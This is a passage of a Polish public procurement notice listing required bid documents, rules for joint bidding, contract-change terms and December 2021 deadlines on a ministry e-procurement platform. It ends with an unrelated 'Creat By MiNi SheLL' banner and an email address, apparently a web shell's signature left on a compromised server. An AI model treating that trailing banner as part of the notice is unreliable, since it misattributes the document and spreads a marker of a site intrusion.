upełnomocnionego.<br/>2. „Samooczyszczenie” – oświadczenie złożone zgodnie z Rodz. 4 pkt II ust. 6 (jeżeli dotyczy)<br/>Zamawiający ocenia czy podjęte przez Wykonawcę czynności są wystarczające do wykazania<br/>jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu Wykonawcy, a jeżeli uzna,<br/>że nie są wystarczające, wyklucza Wykonawcę.<br/>3. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym<br/>mowa w Rozdz. 3 pkt II ust. 8 stanowiący załącznik nr 8 do SWZ (jeżeli dotyczy)<br/>4. Formularz ofertowy (Wzór stanowi Załącznik Nr 2 do SWZ)<br/>5. Przedmiotowe środki dowodowe, o których mowa w Rozdziale 2 ust. 9 (nie dotyczy).<br/>6. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdz. 3 pkt. I. ust. 4<br/>(jeżeli dotyczy) stanowiące Załącznik Nr 4 do SWZ (jeżeli dotyczy)<br/>7. Dokument potwierdzający zabezpieczenie oferty akceptowalną forma wadium (jeżeli dotyczy).<br/>W przypadku zabezpieczenia oferty wadium w postaci innej niż pieniężna wymagane jest<br/>załączenie oryginału dokumentu potwierdzającego zabezpieczenie oferty wymaganą kwotą<br/>wadium. Wniesienie wadium formie poręczeń lub gwarancjach musi zostać przekazane w<br/>oryginale, w postaci elektronicznej.<br/>W przypadku wniesienia wadium w formie pieniężnej Zamawiający dokona sprawdzenia, czy<br/>wymagana kwota wpłynęła na konto Zamawiającego w wymaganym terminie. Wykonawca może<br/>załączyć do oferty dokument potwierdzający wniesienie wadium, co ułatwi Zamawiającemu<br/>badanie ofert.<br/>8. Wykaz rozwiązań równoważnych (jeżeli dotyczy).<br/>Jeżeli Zamawiający przewidział możliwość powołania się na rozwiązania równoważne a<br/>Wykonawca, korzysta z tej możliwości to zobowiązany jest wykazać, że oferowane przez niego<br/>rozwiązanie spełnia wymagania określone przez Zamawiającego. W takim przypadku<br/>zobowiązany jest załączyć do oferty Wykaz rozwiązań równoważnych z jego opisem lub<br/>normami.<br/>9. Oświadczenie o zastrzeżenie określonych informacji jako tajemnicy przedsiębiorstwa (jeżeli<br/>dotyczy)<br/>W sytuacji gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały<br/>tajemnicę przedsiębiorstwa, Wykonawca wraz z przekazaniem takich dokumentów zobowiązany<br/>jest zastrzec, że nie mogą być one udostępniane. Wykonawca ponadto zobowiązany jest<br/>wykazać, że zastrzeżone przez niego informacje stanowią tajemnice przedsiębiorstwa w<br/>rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy, zgodnie z art. 58 ust. 2 Ustawy Pzp, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają wraz<br/>ofertą Pełnomocnictwo w oryginale lub kopii poświadczonej za zgodność z oryginałem przez<br/>notariusza, z którego powinien wynikać zakres umocowania dla pełnomocnika ustanowionego<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnictwo<br/>należy dołączyć do oferty. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia została<br/>wybrana jako najkorzystniejsza, Zamawiający może żądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego okazania umowy regulującej współpracę tych Wykonawców.<br/>Zamawiający może żądać, aby umowa ta określała, wg. wyboru Zamawiającego: strony umowy,<br/>cel działania, sposób współdziałania, zakres prac realizowanych przez każdego z nich, solidarną<br/>odpowiedzialność za wykonanie zamówienia, oznaczenie czasu trwania konsorcjum<br/>(obejmującego okres realizacji przedmiotu zamówienia, gwarancji i rękojmi), wykluczenie<br/>możliwości wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu<br/>wykonania zamówienia.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu.<br/>5. Zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w<br/>odniesieniu do pojedynczych Wykonawców.<br/>6. Warunek udziału w postępowaniu, o którym mowa w rozdz. 4. pkt I ust. 2 (prowadzenia<br/>określonej działalności gospodarczej lub zawodowej), jest spełniony jeżeli co najmniej jeden z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane,<br/>dostawy lub usługi, do których realizacji te uprawnienia są wymagane (jeżeli dotyczy).<br/>7. Warunki udziału w postępowaniu dotyczące wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane (jeżeli dotyczy).<br/>8. Na potwierdzenie okoliczności, o których mowa w ust. 6 i 7 Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany do umowy zostały określone w postanowieniach umowy w § 16 Zmiany umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złozyć za pośrednictwem Platformy pod adresem: https://zamowienia-mkidn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin realizacji zamówienia:<br/>• Usługi w zakresie, o którym mowa w §1 ust. 2 pkt 1)-5) Wykonawca zobowiązany jest<br/>zrealizować w terminie nie dłuższym niż 45 dni kalendarzowych od daty zawarcia umowy*<br/>(*zgodnie z deklaracją Wykonawcy w zakresie ustanowionego kryterium).<br/>• Usługi w zakresie, o którym mowa w §1 ust. 2 pkt 6)-8) Wykonawca zobowiązany jest<br/>świadczyć przez okres 12 miesięcy po dokonaniu odbioru prawidłowo działającego Systemu, o<br/>którym mowa §1 ust. 2 pkt 1)-5), przy czym rozpoczęcie tej części realizacji przedmiotu<br/>zamówienia nie może nastąpić wcześniej niż od dnia 01.01.2022 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com